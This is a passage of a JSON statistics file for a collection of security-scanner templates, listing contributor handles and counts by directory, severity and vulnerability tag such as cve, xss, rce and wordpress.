security","count":1},{"name":"husain","count":1},{"name":"w8ay","count":1},{"name":"defte","count":1},{"name":"zinminphy0","count":1},{"name":"yiran","count":1},{"name":"qlkwej","count":1},{"name":"rivalsec","count":1},{"name":"pussycat0","count":1},{"name":"danigoland","count":1},{"name":"unkl4b","count":1},{"name":"smaranchand","count":1},{"name":"joanbonon","count":1},{"name":"0xceba","count":1},{"name":"shockwave","count":1},{"name":"daviey","count":1},{"name":"sherlocksecurity","count":1},{"name":"elitebaz","count":1},{"name":"barthy.koeln","count":1},{"name":"nan-kl","count":1},{"name":"elmahdi","count":1},{"name":"th3r4id","count":1},{"name":"erethon","count":1},{"name":"remonsec","count":1},{"name":"xeldax","count":1},{"name":"b0rn2r00t","count":1},{"name":"hlop","count":1},{"name":"f1she3","count":1},{"name":"none","count":1},{"name":"samuelsamuelsamuel","count":1},{"name":"staticnoise","count":1},{"name":"viniciuspereiras","count":1},{"name":"vikas kundu","count":1},{"name":"shifacyclewla","count":1},{"name":"5up3r541y4n","count":1},{"name":"tirtha","count":1},{"name":"koyejune0302","count":1},{"name":"aravind","count":1},{"name":"high","count":1},{"name":"xstp","count":1},{"name":"geraldino2","count":1},{"name":"0h1in9e","count":1},{"name":"un-fmunozs","count":1},{"name":"drfabiocastro","count":1},{"name":"ptonewreckin","count":1},{"name":"exid","count":1},{"name":"mohammad reza omrani | @omranisecurity","count":1},{"name":"mr.bobo hp","count":1},{"name":"tirtha_mandal","count":1},{"name":"ramkrishna sawant","count":1},{"name":"lethargynavigator","count":1},{"name":"sshell","count":1},{"name":"alevsk","count":1},{"name":"professorabhay","count":1},{"name":"ingbunga","count":1},{"name":"asteria121","count":1},{"name":"chetgan","count":1},{"name":"vinit989","count":1},{"name":"harryha","count":1},{"name":"yashanand155","count":1},{"name":"revblock","count":1},{"name":"luciannitescu","count":1},{"name":"omarkurt","count":1},{"name":"dwbzn","count":1},{"name":"act1on3","count":1},{"name":"fopina","count":1},{"name":"mah3sec_","count":1},{"name":"puben","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"drewvravick","count":1},{"name":"akash.c","count":1},{"name":"clment cruchet","count":1},{"name":"nielsing","count":1},{"name":"andysvints","count":1},{"name":"shiva (strobes security)","count":1},{"name":"eremit4","count":1},{"name":"aron molnar","count":1},{"name":"rahaaaiii","count":1},{"name":"pwnwithlove","count":1},{"name":"philippdelteil","count":1},{"name":"arqsz","count":1},{"name":"b4uh0lz","count":1},{"name":"breno_css","count":1},{"name":"millermedia","count":1},{"name":"nukunga","count":1},{"name":"gmeghab","count":1},{"name":"freakyclown","count":1},{"name":"yusakie","count":1},{"name":"screamy","count":1},{"name":"xcapri","count":1},{"name":"olewagner","count":1},{"name":"esonhugh","count":1},{"name":"evan rubinstien","count":1},{"name":"nuts7","count":1},{"name":"0ut0fb4nd","count":1},{"name":"stupidfish","count":1},{"name":"codestuffbreakthings","count":1},{"name":"mukundbhuva","count":1},{"name":"babybash","count":1},{"name":"prettyboyaaditya","count":1},{"name":"miryangjung","count":1},{"name":"will mccardell","count":1},{"name":"b0yd","count":1},{"name":"davidfegyver","count":1},{"name":"alpernae","count":1},{"name":"bad5ect0r","count":1},{"name":"2rs3c","count":1},{"name":"0xtavian","count":1},{"name":"ryanborum","count":1},{"name":"pratik khalane","count":1},{"name":"anonymous","count":1},{"name":"rinolock","count":1},{"name":"open-sec","count":1},{"name":"yaser_s","count":1},{"name":"ramondunker","count":1},{"name":"rojanrijal","count":1},{"name":"micha3lb3n","count":1},{"name":"intx0x80","count":1},{"name":"sec_hawk","count":1},{"name":"aaronchen0","count":1},{"name":"ldionmarcil","count":1},{"name":"zeyad azima","count":1},{"name":"droberson","count":1},{"name":"mihhailsokolov","count":1},{"name":"xshuden","count":1},{"name":"notwhy","count":1},{"name":"jaimin gondaliya","count":1},{"name":"j33n1k4","count":1},{"name":"kagamigawa","count":1},{"name":"bjhulst","count":1},{"name":"jiheon-dev","count":1},{"name":"qianbenhyu","count":1},{"name":"mys7ic","count":1},{"name":"josecosta","count":1},{"name":"knassar702","count":1},{"name":"official_blackhat13","count":1},{"name":"irshadahamed","count":1},{"name":"banana69","count":1},{"name":"abut0n","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"jacalynli","count":1},{"name":"tangxiaofeng7","count":1},{"name":"nytr0gen","count":1},{"name":"jub0bs","count":1},{"name":"lbb","count":1},{"name":"carson chan","count":1},{"name":"noel","count":1},{"name":"aaban solutions","count":1},{"name":"alex","count":1},{"name":"invisiblethreat","count":1},{"name":"spac3wh1te","count":1},{"name":"wabafet","count":1},{"name":"arjunchandarana","count":1},{"name":"queencitycyber","count":1},{"name":"napgh0st","count":1},{"name":"mammad_rahimzada","count":1},{"name":"thebinitghimire","count":1},{"name":"zsusac","count":1},{"name":"s1r1u5_","count":1},{"name":"qotoz","count":1},{"name":"breakpack","count":1},{"name":"iampritam","count":1},{"name":"non-things","count":1},{"name":"houdinis","count":1},{"name":"x6263","count":1},{"name":"ringo","count":1},{"name":"ynnirc","count":1},{"name":"ndmalc","count":1},{"name":"ahmed abou-ela","count":1},{"name":"phyr3wall","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"shivanshkhari","count":1},{"name":"juicypotato1","count":1},{"name":"colbyjack1134","count":1},{"name":"chesterblue","count":1},{"name":"hardik-rathod","count":1},{"name":"zeroc00i","count":1},{"name":"andirrahmani1","count":1},{"name":"kchason","count":1},{"name":"chron0x","count":1},{"name":"manuelbua","count":1},{"name":"amnotacat","count":1},{"name":"exploitation","count":1},{"name":"vzamanillo","count":1},{"name":"technicaljunkie","count":1},{"name":"hel10-web","count":1},{"name":"paper-pen","count":1},{"name":"couskito","count":1},{"name":"kabirsuda","count":1},{"name":"hexcat","count":1},{"name":"kaizensecurity","count":1},{"name":"watchtowr","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"diablo","count":1},{"name":"jc175","count":1},{"name":"christbowel","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"jbaines-r7","count":1},{"name":"vulnspace","count":1},{"name":"jfbes","count":1},{"name":"numan tĂŒrle","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"flag007","count":1},{"name":"manasmbellani","count":1},{"name":"allendemoura","count":1},{"name":"daffianfo","count":1},{"name":"piyushchhiroliya","count":1},{"name":"undefl0w","count":1},{"name":"mantissts","count":1},{"name":"sechunt3r","count":1},{"name":"co0nan","count":1},{"name":"ohlinge","count":1},{"name":"bartu utku sarp","count":1},{"name":"narluin","count":1},{"name":"worldwidefuckfest","count":1},{"name":"bughuntersurya","count":1},{"name":"akokonunes","count":1},{"name":"furkansenan","count":1},{"name":"ooooooo_q","count":1},{"name":"jcockhren","count":1},{"name":"jna1","count":1},{"name":"stux","count":1},{"name":"securitytaters","count":1},{"name":"ahmed sherif","count":1},{"name":"therealtoastycat","count":1},{"name":"mariam tariq","count":1},{"name":"floriandewald","count":1},{"name":"dawid-czarnecki","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"zn9988","count":1},{"name":"arr0way","count":1},{"name":"rotembar","count":1},{"name":"opencirt","count":1},{"name":"0xprial","count":1},{"name":"0xparth","count":1},{"name":"am0nt31r0","count":1},{"name":"jrolf","count":1},{"name":"lixts","count":1},{"name":"willd96","count":1},{"name":"rotemreiss","count":1},{"name":"pudsec","count":1},{"name":"higor melgaço","count":1},{"name":"dhiyanesdk","count":1},{"name":"harksu","count":1},{"name":"pastaga","count":1},{"name":"mayankpandey01","count":1},{"name":"jaskaran","count":1},{"name":"m0ck3d","count":1},{"name":"metascan","count":1},{"name":"oscarintherocks","count":1},{"name":"danfaizer","count":1},{"name":"fmunozs","count":1},{"name":"realexp3rt","count":1},{"name":"jas37","count":1},{"name":"hĂŒseyin tintaƟ","count":1},{"name":"af001","count":1},{"name":"efran","count":1},{"name":"ruppde","count":1},{"name":"harshinsecurity","count":1},{"name":"bywalks","count":1},{"name":"omarjezi","count":1},{"name":"blckraven","count":1},{"name":"jteles","count":1},{"name":"david botelho mariano","count":1},{"name":"kaks3c","count":1},{"name":"lambdasawa","count":1},{"name":"youngpope","count":1},{"name":"abbas.heybati","count":1},{"name":"bleron rrustemi","count":1},{"name":"carrot2","count":1},{"name":"0xh7ml","count":1},{"name":"william söderberg @ withsecure","count":1},{"name":"shelld3v","count":1},{"name":"sdcampbell","count":1},{"name":"unknown","count":1},{"name":"yuansec","count":1},{"name":"ransomsec","count":1},{"name":"ayadi","count":1},{"name":"brabbit10","count":1},{"name":"makyotox","count":1},{"name":"encodedguy","count":1},{"name":"win3zz","count":1},{"name":"dabla","count":1},{"name":"unp4ck","count":1},{"name":"deena","count":1},{"name":"gpiechnik2","count":1},{"name":"denandz","count":1},{"name":"francescocarlucci","count":1},{"name":"0xd0ff9","count":1},{"name":"ahmetpergamum","count":1},{"name":"jonathanwalker","count":1},{"name":"jbertman","count":1},{"name":"arall","count":1},{"name":"ph33rr","count":1},{"name":"justmumu","count":1},{"name":"hazana","count":1},{"name":"olfloralo","count":1},{"name":"viondexd","count":1},{"name":"mohammedsaneem","count":1},{"name":"luskabol","count":1},{"name":"johndoeanonita","count":1},{"name":"mohsen yaghoubi","count":1},{"name":"wlayzz","count":1},{"name":"axrk","count":1},{"name":"team syslifters / christoph mahrl","count":1},{"name":"petergrifin","count":1},{"name":"sim4110","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"hateshape","count":1},{"name":"sospiro","count":1},{"name":"ledoubletake","count":1},{"name":"n0el4kls","count":1},{"name":"sumanth vankineni","count":1},{"name":"push4d","count":1},{"name":"momen eldawakhly","count":1},{"name":"adrianmf","count":1},{"name":"ling","count":1},{"name":"rodnt","count":1},{"name":"0xrod","count":1},{"name":"vthiery","count":1},{"name":"rubina119","count":1},{"name":"adamparsons","count":1},{"name":"kurohost","count":1},{"name":"themiddle","count":1},{"name":"sak1","count":1},{"name":"iphantasmic","count":1},{"name":"lady_bug","count":1},{"name":"majidmc2","count":1},{"name":"rschio","count":1},{"name":"fpatrik","count":1},{"name":"mlec","count":1},{"name":"marcio mendes","count":1},{"name":"hotpot","count":1},{"name":"hyunsoo-ds","count":1},{"name":"ipanda","count":1},{"name":"amirmsafari","count":1},{"name":"ap3r","count":1},{"name":"regala_","count":1},{"name":"morgan robertson","count":1},{"name":"pascalheidmann","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"jeya seelan","count":1},{"name":"phillipo","count":1},{"name":"pepitoh","count":1},{"name":"mubassirpatel","count":1},{"name":"1nf1n7y","count":1},{"name":"palanichamy_perumal","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"h4sh5","count":1},{"name":"yhy0","count":1},{"name":"orpheus","count":1},{"name":"vince-isec","count":1},{"name":"cravaterouge","count":1},{"name":"compr00t","count":1},{"name":"domenicoveneziano","count":1},{"name":"thirukrishnan","count":1},{"name":"tehtbl","count":1},{"name":"mrcl0wnlab","count":1},{"name":"r3nz0","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"pphuahua","count":1},{"name":"apt-mirror","count":1},{"name":"yashgoti","count":1},{"name":"fazle arefin","count":1},{"name":"guax1","count":1},{"name":"luqman","count":1},{"name":"cbadke","count":1},{"name":"furkansayim","count":1},{"name":"zandros0","count":1},{"name":"jeya.seelan","count":1},{"name":"akshansh","count":1},{"name":"juliosmelo","count":1},{"name":"r3s ost","count":1},{"name":"yashvardhantripathi","count":1},{"name":"izn0u","count":1},{"name":"mayank_pandey01","count":1},{"name":"calumjelrick","count":1},{"name":"kr1shna4garwal","count":1},{"name":"naglis","count":1},{"name":"mchklt","count":1},{"name":"thelicato","count":1},{"name":"elder tao","count":1},{"name":"kiransau","count":1},{"name":"dorkerdevil","count":1},{"name":"absshax","count":1},{"name":"k3rwin","count":1},{"name":"nerrorsec","count":1},{"name":"ofjaaah","count":1},{"name":"ilovebinbash","count":1},{"name":"marcos_iaf","count":1},{"name":"alexrydzak","count":1},{"name":"cheoljun99","count":1},{"name":"notsoevilweasel","count":1},{"name":"sickwell","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"becivells","count":1},{"name":"duty_1g","count":1},{"name":"0xceeb","count":1},{"name":"booboohq","count":1},{"name":"w0tx","count":1},{"name":"kresec","count":1},{"name":"elouhi","count":1},{"name":"sorrowx3","count":1},{"name":"s1r1us","count":1},{"name":"abdullahisik","count":1},{"name":"patrick pirker","count":1},{"name":"th3.d1p4k","count":1},{"name":"aresx","count":1},{"name":"igibanez","count":1},{"name":"lrtk-coder","count":1},{"name":"exceed","count":1},{"name":"caon","count":1},{"name":"shreyapohekar","count":1},{"name":"d4ly","count":1},{"name":"affix","count":1},{"name":"lingtren","count":1},{"name":"udyz","count":1},{"name":"patralos","count":1},{"name":"fur1na","count":1},{"name":"gboddin","count":1},{"name":"nagli","count":1},{"name":"borna nematzadeh","count":1},{"name":"dale clarke","count":1},{"name":"imhunterand","count":1},{"name":"pjborah","count":1},{"name":"0xelkomy \u0026 c0nqr0r","count":1},{"name":"sttlr","count":1},{"name":"dk999","count":1},{"name":"unblvr1","count":1},{"name":"kiks7","count":1},{"name":"mesaglio","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"luqmaan hadia","count":1},{"name":"zhenwarx","count":1},{"name":"sicksec","count":1},{"name":"matt miller","count":1},{"name":"petruknisme","count":1},{"name":"myst7ic","count":1},{"name":"alperenkesk","count":1},{"name":"chybeta","count":1},{"name":"michael wedl","count":1},{"name":"retr0","count":1},{"name":"shiar","count":1},{"name":"archer","count":1},{"name":"h4kux","count":1},{"name":"ok_bye_now","count":1},{"name":"charanrayudu","count":1},{"name":"shivampand3y","count":1},{"name":"bugvsme","count":1},{"name":"bjxsec","count":1},{"name":"apple","count":1},{"name":"noamrathaus","count":1},{"name":"null_hypothesis","count":1},{"name":"liquidsec","count":1},{"name":"fq_hsu","count":1},{"name":"michal-mikolas","count":1},{"name":"natto97","count":1},{"name":"hakimkt","count":1},{"name":"xiaowangsec","count":1},{"name":"anon-artist","count":1},{"name":"stuxctf","count":1},{"name":"pry0cc","count":1},{"name":"miroslavsotak","count":1},{"name":"dmartyn","count":1},{"name":"f0xy","count":1},{"name":"adnanekhan","count":1},{"name":"pdp","count":1},{"name":"gonski","count":1},{"name":"xc1ym","count":1},{"name":"jadu101","count":1},{"name":"noobexploiter","count":1},{"name":"sanineng","count":1},{"name":"failopen","count":1},{"name":"joaonevess","count":1},{"name":"berkdusunur","count":1},{"name":"lamscun","count":1},{"name":"djoevanka","count":1},{"name":"amir-h-fallahi","count":1},{"name":"karkis3c","count":1},{"name":"aayush vishnoi","count":1},{"name":"mass0ma","count":1},{"name":"miguelsegoviagil","count":1},{"name":"mabdullah22","count":1},{"name":"0xteles","count":1},{"name":"ola456","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"whynotke","count":1},{"name":"mordavid","count":1},{"name":"lark lab","count":1},{"name":"dali","count":1},{"name":"osamahamad","count":1},{"name":"secthebit","count":1},{"name":"hakluke","count":1},{"name":"retr02332","count":1},{"name":"allenwest24","count":1},{"name":"sw0rk17","count":1},{"name":"whotwagner","count":1},{"name":"barttran2000","count":1},{"name":"galoget","count":1},{"name":"erikowen","count":1},{"name":"godfatherorwa","count":1},{"name":"savik","count":1},{"name":"nechyo","count":1},{"name":"west-wise","count":1},{"name":"nobody","count":1},{"name":"amanrawat","count":1},{"name":"ky9oss","count":1},{"name":"mihail8531","count":1},{"name":"infosecsanyam","count":1},{"name":"tim_koopmans","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"mbmy","count":1},{"name":"aringo-bf","count":1},{"name":"httpvoid","count":1},{"name":"p-l-","count":1},{"name":"yavolo","count":1},{"name":"defektive","count":1},{"name":"kareemse1im","count":1},{"name":"udinchan","count":1},{"name":"wpsec","count":1},{"name":"_c0wb0y_","count":1},{"name":"carlosvieira","count":1}],"directory":[{"name":"http","count":7977},{"name":"file","count":402},{"name":"cloud","count":325},{"name":"workflows","count":192},{"name":"network","count":137},{"name":"code","count":82},{"name":"javascript","count":65},{"name":"ssl","count":30},{"name":"dast","count":25},{"name":"dns","count":22},{"name":"headless","count":16},{"name":"passive","count":1},{"name":"TEMPLATES-STATS.json","count":1},{"name":"cves.json","count":1},{"name":"contributors.json","count":1}],"severity":[{"name":"info","count":3855},{"name":"high","count":2033},{"name":"medium","count":1727},{"name":"critical","count":1145},{"name":"low","count":279},{"name":"unknown","count":43}],"types":[{"name":"file","count":402},{"name":"dns","count":25}]} +{"tags":[{"name":"cve","count":2773},{"name":"panel","count":1212},{"name":"wordpress","count":1046},{"name":"exposure","count":997},{"name":"xss","count":956},{"name":"wp-plugin","count":915},{"name":"osint","count":807},{"name":"tech","count":729},{"name":"lfi","count":713},{"name":"misconfig","count":713},{"name":"rce","count":659},{"name":"edb","count":598},{"name":"packetstorm","count":550},{"name":"wpscan","count":522},{"name":"cve2021","count":496},{"name":"cve2022","count":477},{"name":"wp","count":469},{"name":"cve2023","count":437},{"name":"sqli","count":415},{"name":"devops","count":403},{"name":"unauth","count":387},{"name":"detect","count":371},{"name":"authenticated","count":369},{"name":"cloud","count":360},{"name":"file","count":345},{"name":"intrusive","count":337},{"name":"login","count":337},{"name":"kev","count":282},{"name":"cve2024","count":270},{"name":"cve2020","count":257},{"name":"token-spray","count":246},{"name":"default-login","count":245},{"name":"oast","count":236},{"name":"microsoft","count":235},{"name":"top-200","count":229},{"name":"config","count":227},{"name":"apache","count":219},{"name":"malware","count":212},{"name":"osint-social","count":210},{"name":"azure","count":209},{"name":"network","count":202},{"name":"token","count":194},{"name":"","count":193},{"name":"azure-cloud-config","count":191},{"name":"cve2018","count":170},{"name":"iot","count":169},{"name":"cve2019","count":166},{"name":"install","count":160},{"name":"keys","count":156},{"name":"auth-bypass","count":150},{"name":"joomla","count":148},{"name":"redirect","count":146},{"name":"tcp","count":137},{"name":"aws","count":136},{"name":"ssrf","count":131},{"name":"amazon","count":118},{"name":"phishing","count":117},{"name":"cms","count":115},{"name":"files","count":114},{"name":"cve2017","count":114},{"name":"cve2010","count":112},{"name":"router","count":108},{"name":"top-100","count":100},{"name":"aws-cloud-config","count":91},{"name":"disclosure","count":90},{"name":"linux","count":85},{"name":"code","count":83},{"name":"seclists","count":82},{"name":"local","count":80},{"name":"takeover","count":79},{"name":"privesc","count":79},{"name":"tokens","count":78},{"name":"fileupload","count":76},{"name":"oracle","count":74},{"name":"kubernetes","count":73},{"name":"oss","count":71},{"name":"js","count":70},{"name":"cisco","count":70},{"name":"enum","count":65},{"name":"adobe","count":64},{"name":"ir","count":63},{"name":"k8s","count":62},{"name":"huntr","count":61},{"name":"cve2015","count":59},{"name":"atlassian","count":59},{"name":"vmware","count":57},{"name":"cve2016","count":57},{"name":"detection","count":57},{"name":"c2","count":57},{"name":"google","count":56},{"name":"tenable","count":49},{"name":"logs","count":48},{"name":"cve2014","count":48},{"name":"log4j","count":47},{"name":"vulhub","count":46},{"name":"debug","count":46},{"name":"hackerone","count":46},{"name":"php","count":46},{"name":"aem","count":45},{"name":"osint-gaming","count":45},{"name":"generic","count":45},{"name":"jndi","count":44},{"name":"deserialization","count":44},{"name":"cnvd","count":44},{"name":"traversal","count":43},{"name":"oa","count":43},{"name":"osint-porn","count":42},{"name":"osint-hobby","count":42},{"name":"plugin","count":42},{"name":"springboot","count":41},{"name":"misc","count":40},{"name":"injection","count":40},{"name":"miscellaneous","count":39},{"name":"ibm","count":39},{"name":"listing","count":39},{"name":"file-upload","count":38},{"name":"cti","count":37},{"name":"jira","count":37},{"name":"sap","count":35},{"name":"fuzz","count":35},{"name":"osint-misc","count":35},{"name":"k8s-cluster-security","count":34},{"name":"gitlab","count":33},{"name":"ssl","count":33},{"name":"dlink","count":32},{"name":"tls","count":32},{"name":"devsecops","count":32},{"name":"wp-theme","count":31},{"name":"osint-tech","count":31},{"name":"fortinet","count":31},{"name":"ec2","count":30},{"name":"osint-coding","count":30},{"name":"api","count":30},{"name":"lfr","count":28},{"name":"proxy","count":27},{"name":"bestwebsoft","count":27},{"name":"citrix","count":27},{"name":"dns","count":27},{"name":"info-leak","count":27},{"name":"tomcat","count":26},{"name":"firewall","count":26},{"name":"printer","count":26},{"name":"manageengine","count":26},{"name":"xxe","count":26},{"name":"ssh","count":26},{"name":"admin","count":26},{"name":"cve2012","count":26},{"name":"zohocorp","count":26},{"name":"dast","count":25},{"name":"zoho","count":25},{"name":"weaver","count":25},{"name":"prestashop","count":25},{"name":"osint-images","count":24},{"name":"osint-business","count":24},{"name":"osint-shopping","count":24},{"name":"osint-finance","count":24},{"name":"yonyou","count":24},{"name":"postgresql","count":24},{"name":"audit","count":23},{"name":"stored-xss","count":23},{"name":"cicd","count":23},{"name":"github","count":22},{"name":"s3","count":22},{"name":"dashboard","count":22},{"name":"msf","count":21},{"name":"ecology","count":21},{"name":"weblogic","count":21},{"name":"nginx","count":20},{"name":"wavlink","count":20},{"name":"camera","count":20},{"name":"jenkins","count":20},{"name":"ftp","count":20},{"name":"struts","count":19},{"name":"grafana","count":19},{"name":"nsg","count":19},{"name":"rukovoditel","count":19},{"name":"ssti","count":19},{"name":"apt","count":19},{"name":"hp","count":19},{"name":"coldfusion","count":19},{"name":"headless","count":19},{"name":"vpn","count":19},{"name":"confluence","count":19},{"name":"android","count":18},{"name":"xwiki","count":18},{"name":"ruijie","count":18},{"name":"node.js","count":18},{"name":"ivanti","count":18},{"name":"backdoor","count":18},{"name":"osint-music","count":18},{"name":"cve2011","count":18},{"name":"honeypot","count":17},{"name":"magento","count":17},{"name":"bypass","count":17},{"name":"microweber","count":17},{"name":"backup","count":17},{"name":"error","count":17},{"name":"zyxel","count":17},{"name":"mail","count":17},{"name":"status","count":16},{"name":"osint-blog","count":16},{"name":"service","count":16},{"name":"redis","count":16},{"name":"netgear","count":16},{"name":"alibaba","count":16},{"name":"installer","count":16},{"name":"cve2009","count":16},{"name":"setup","count":16},{"name":"rconfig","count":16},{"name":"jarm","count":16},{"name":"moosocial","count":15},{"name":"cve2013","count":15},{"name":"cnvd2021","count":15},{"name":"seeyon","count":15},{"name":"nagios","count":15},{"name":"tongda","count":15},{"name":"woocommerce","count":15},{"name":"java","count":15},{"name":"log","count":15},{"name":"mysql","count":15},{"name":"docker","count":15},{"name":"ofbiz","count":15},{"name":"ruby","count":15},{"name":"cve2008","count":15},{"name":"redhat","count":15},{"name":"osint-art","count":14},{"name":"windows","count":14},{"name":"login-check","count":14},{"name":"creds-stuffing","count":14},{"name":"jboss","count":14},{"name":"rds","count":14},{"name":"nodejs","count":14},{"name":"node","count":14},{"name":"npm","count":14},{"name":"icewarp","count":14},{"name":"osint-health","count":14},{"name":"git","count":14},{"name":"smtp","count":14},{"name":"domainmod","count":14},{"name":"dell","count":14},{"name":"zimbra","count":13},{"name":"spring","count":13},{"name":"sonicwall","count":13},{"name":"abstractapi","count":13},{"name":"osint-dating","count":13},{"name":"hashicorp","count":13},{"name":"drupal","count":13},{"name":"instrusive","count":13},{"name":"laravel","count":13},{"name":"rails","count":13},{"name":"osint-political","count":13},{"name":"auth","count":13},{"name":"fortigate","count":13},{"name":"kafka","count":13},{"name":"cache","count":13},{"name":"graphql","count":13},{"name":"cuppa","count":13},{"name":"cuppacms","count":13},{"name":"airflow","count":13},{"name":"dedecms","count":12},{"name":"deployments","count":12},{"name":"appservice","count":12},{"name":"netsweeper","count":12},{"name":"newrelic","count":12},{"name":"iis","count":12},{"name":"progress","count":12},{"name":"phpgurukul","count":12},{"name":"hikvision","count":12},{"name":"smb","count":12},{"name":"vbulletin","count":12},{"name":"doppler","count":12},{"name":"fuzzing","count":12},{"name":"storage","count":12},{"name":"jetbrains","count":12},{"name":"webserver","count":12},{"name":"glpi","count":12},{"name":"phpmyadmin","count":11},{"name":"django","count":11},{"name":"keyvault","count":11},{"name":"zabbix","count":11},{"name":"iam","count":11},{"name":"thinkphp","count":11},{"name":"crlf","count":11},{"name":"blind","count":11},{"name":"fastjson","count":11},{"name":"prometheus","count":11},{"name":"python","count":11},{"name":"xstream","count":11},{"name":"osint-video","count":11},{"name":"jolokia","count":11},{"name":"sitecore","count":10},{"name":"fortios","count":10},{"name":"openai","count":10},{"name":"console","count":10},{"name":"f5","count":10},{"name":"xstream_project","count":10},{"name":"elasticsearch","count":10},{"name":"dahua","count":10},{"name":"solr","count":10},{"name":"db","count":10},{"name":"dropbox","count":10},{"name":"symfony","count":10},{"name":"secret","count":10},{"name":"solarview","count":10},{"name":"digitalocean","count":10},{"name":"samsung","count":10},{"name":"versa","count":9},{"name":"odoo","count":9},{"name":"pfsense","count":9},{"name":"gateway","count":9},{"name":"vcenter","count":9},{"name":"solarwinds","count":9},{"name":"mlflow","count":9},{"name":"sophos","count":9},{"name":"servicenow","count":9},{"name":"lucee","count":9},{"name":"scada","count":9},{"name":"cnvd2020","count":9},{"name":"sangfor","count":9},{"name":"druid","count":9},{"name":"cloudtrail","count":9},{"name":"opencats","count":9},{"name":"bitbucket","count":9},{"name":"gradio","count":9},{"name":"exchange","count":9},{"name":"artica","count":9},{"name":"gitea","count":9},{"name":"facebook","count":9},{"name":"wso2","count":9},{"name":"kube","count":9},{"name":"elastic","count":9},{"name":"joomla\\!","count":9},{"name":"firebase","count":9},{"name":"moodle","count":9},{"name":"phpjabbers","count":8},{"name":"oauth","count":8},{"name":"mirai","count":8},{"name":"cisco-switch","count":8},{"name":"lfprojects","count":8},{"name":"default-page","count":8},{"name":"avtech","count":8},{"name":"ognl","count":8},{"name":"nexus","count":8},{"name":"manager","count":8},{"name":"nagiosxi","count":8},{"name":"azure-storage","count":8},{"name":"bucket","count":8},{"name":"cloud-enum","count":8},{"name":"nacos","count":8},{"name":"wanhu","count":8},{"name":"go","count":8},{"name":"spotweb","count":8},{"name":"landray","count":8},{"name":"recon","count":8},{"name":"spotweb_project","count":8},{"name":"mobileiron","count":8},{"name":"symantec","count":8},{"name":"microfocus","count":8},{"name":"huawei","count":8},{"name":"metadata","count":8},{"name":"bloofox","count":8},{"name":"bigip","count":8},{"name":"ldap","count":8},{"name":"emerge","count":8},{"name":"atom","count":8},{"name":"security","count":8},{"name":"discord","count":8},{"name":"hms","count":8},{"name":"cacti","count":8},{"name":"strapi","count":8},{"name":"vmss","count":8},{"name":"osint-news","count":8},{"name":"config-audit","count":8},{"name":"mongodb","count":8},{"name":"openemr","count":8},{"name":"aks","count":8},{"name":"unauthenticated","count":8},{"name":"e-office","count":8},{"name":"phpinfo","count":8},{"name":"sql","count":8},{"name":"websphere","count":7},{"name":"linkedin","count":7},{"name":"pods","count":7},{"name":"exploitdb","count":7},{"name":"squirrelmail","count":7},{"name":"twitter","count":7},{"name":"keycloak","count":7},{"name":"database","count":7},{"name":"oos","count":7},{"name":"nextjs","count":7},{"name":"leak","count":7},{"name":"geoserver","count":7},{"name":"rfi","count":7},{"name":"blockchain","count":7},{"name":"filemanager","count":7},{"name":"vms","count":7},{"name":"ruckus","count":7},{"name":"teamcity","count":7},{"name":"gogs","count":7},{"name":"maps","count":7},{"name":"opensis","count":7},{"name":"car_rental_management_system_project","count":7},{"name":"slack","count":7},{"name":"keking","count":7},{"name":"couchdb","count":7},{"name":"virtual-machines","count":7},{"name":"cnvd2023","count":7},{"name":"activemq","count":7},{"name":"moodating","count":7},{"name":"telesquare","count":7},{"name":"shopify","count":7},{"name":"vpc","count":7},{"name":"contec","count":7},{"name":"fpd","count":7},{"name":"splunk","count":7},{"name":"rat","count":7},{"name":"jeecg","count":7},{"name":"pmb","count":7},{"name":"nortekcontrol","count":7},{"name":"vrealize","count":7},{"name":"monstra","count":7},{"name":"doctor-appointment-system","count":6},{"name":"synacor","count":6},{"name":"learnpress","count":6},{"name":"paloaltonetworks","count":6},{"name":"chanjet","count":6},{"name":"avideo","count":6},{"name":"jwt","count":6},{"name":"jamf","count":6},{"name":"tikiwiki","count":6},{"name":"liferay","count":6},{"name":"pyload","count":6},{"name":"bmc","count":6},{"name":"virtual-machine","count":6},{"name":"sonarqube","count":6},{"name":"mikrotik","count":6},{"name":"magmi","count":6},{"name":"online_fire_reporting_system_project","count":6},{"name":"functionapp","count":6},{"name":"craftcms","count":6},{"name":"h3c","count":6},{"name":"express","count":6},{"name":"elfinder","count":6},{"name":"microstrategy","count":6},{"name":"chamilo","count":6},{"name":"plesk","count":6},{"name":"dom","count":6},{"name":"74cms","count":6},{"name":"minio","count":6},{"name":"spip","count":6},{"name":"cobbler","count":6},{"name":"webmin","count":6},{"name":"typo3","count":6},{"name":"asp","count":6},{"name":"paypal","count":6},{"name":"totolink","count":6},{"name":"gcp","count":6},{"name":"flutterwave","count":6},{"name":"api-management","count":6},{"name":"server","count":6},{"name":"beyondtrust","count":6},{"name":"openvpn","count":6},{"name":"cockpit","count":6},{"name":"doctor_appointment_system_project","count":6},{"name":"asus","count":6},{"name":"jetty","count":6},{"name":"zhiyuan","count":6},{"name":"online-fire-reporting","count":6},{"name":"kubelet","count":6},{"name":"akamai","count":6},{"name":"cve2007","count":6},{"name":"advantech","count":6},{"name":"froxlor","count":6},{"name":"hpe","count":5},{"name":"avaya","count":5},{"name":"axigen","count":5},{"name":"fatpipe","count":5},{"name":"blackenergy","count":5},{"name":"hybris","count":5},{"name":"jellyfin","count":5},{"name":"tibco","count":5},{"name":"checkpoint","count":5},{"name":"circontrol","count":5},{"name":"tenda","count":5},{"name":"httpd","count":5},{"name":"thedigitalcraft","count":5},{"name":"digitaldruid","count":5},{"name":"metinfo","count":5},{"name":"glpi-project","count":5},{"name":"open-emr","count":5},{"name":"api-server","count":5},{"name":"genetechsolutions","count":5},{"name":"react","count":5},{"name":"web3","count":5},{"name":"cdata","count":5},{"name":"qd